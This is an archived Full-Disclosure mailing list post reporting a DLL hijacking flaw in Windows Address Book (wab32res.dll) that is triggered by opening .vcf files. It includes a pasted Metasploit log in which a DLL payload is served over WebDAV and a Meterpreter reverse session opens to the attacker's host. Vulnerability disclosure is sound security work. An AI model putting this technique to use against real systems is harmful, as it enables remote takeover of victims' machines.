[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] DLL hijacking (Windows Address Book - wab32res.dll)

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] DLL hijacking (Windows Address Book - wab32res.dll)
From: matt <matt@xxxxxxxxxxxxxxxx>
Date: Tue, 24 Aug 2010 13:57:42 -0500

For those interested, I just discovered that the Windows Address Book is
vulnerable to DLL hijacking when opening .vcf (and probably other) file
types.

http://www.attackvector.org/new-dll-hijacking-exploits-many/

[..snip..]
[*] 10.0.0.252:1137 PROPFIND /hacku/wab32res.dll
[*] 10.0.0.252:1137 PROPFIND => 207 File (/hacku/wab32res.dll)
[*] 10.0.0.252:1133 GET => DLL Payload
[*] 10.0.0.252:1137 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1137 PROPFIND => 404 (/hacku/rundll32.exe)
[*] 10.0.0.252:1133 GET => DATA (/hacku/owned.vcf)
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] Meterpreter session 4 opened (1.2.3.4:31337 -> 10.0.0.252:1155) at Tue
Aug 24 13:49:02 -0500 2010

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] DLL hijacking (Windows Address Book -wab32res.dll)
  - From: Sherwyn

Prev by Date: [Full-disclosure] t2′10 Challenge to be released 2010-08-28 10:00 EEST
Next by Date: Re: [Full-disclosure] DLL hijacking (Windows Address Book -wab32res.dll)
Previous by thread: [Full-disclosure] t2′10 Challenge to be released 2010-08-28 10:00 EEST
Next by thread: Re: [Full-disclosure] DLL hijacking (Windows Address Book -wab32res.dll)
Index(es):
- Date
- Thread